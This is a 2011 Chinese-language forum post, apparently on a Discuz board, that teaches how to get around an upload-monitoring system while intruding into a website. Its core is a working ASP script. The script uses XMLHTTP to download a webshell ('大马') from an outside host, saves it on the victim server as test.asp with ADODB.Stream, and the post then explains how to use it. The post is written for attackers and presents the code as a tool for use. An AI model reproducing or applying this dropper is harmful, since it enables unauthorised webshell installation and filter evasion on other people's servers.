济溪环保公益

 找回密码
 立即注册

微信登录

微信扫一扫,快速登录

搜索
查看: 865|回复: 0

突破一流信息监控系统实现文件“上传”

[复制链接]

20

主题

0

回帖

39

积分

水滴

积分
39
发表于 2011-1-29 04:21:10 | 显示全部楼层 |阅读模式
我们入侵网站的过程中,有时候提交我们的大马或者其它ASP文件的时候,会被一流信息监控系统所拦截,这是因为它设置了限制提交字符。
         既然它不允许我们进行提交,那我们可以采用下载的方法。这个就好比我们上传大EXE文件的时候,网站禁止了上传,但是我们可以采用外部下载的方式来把目标 文件下载到本地服务器中。好了,这个方法就是,只要服务器没有禁用XML和数据流组件,我们可以往服务器中提交以下ASP脚本文件

<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://www.58ly.com/test.txt",False  //代码在网上的地址 也就是大马
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("test.asp"),2 //在同级目录生成asp的文件
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!")//下载成功提示
%>

利用服务器的XML和数据流组件,从网站上的test.txt的内容下载到目标站点并在上传的同级目录并保存为test.asp。
test.txt中的内容当然就是被拦截的木马内容了。之后访问这个提交的ASP网页文件,会出现一片空白,显示下载文件成功。然后我们再访问这个test.asp文件,则想要上传的内容已经被保存成功!
您需要登录后才可以回帖 登录 | 立即注册 微信登录

本版积分规则

小黑屋|手机版|济溪 ( 京ICP备17053947号-1 )

GMT+8, 2025-6-18 07:07 , Processed in 0.024588 second(s), 24 queries .

Powered by Discuz! X3.4

© 2001-2023 Discuz! Team.

快速回复 返回顶部 返回列表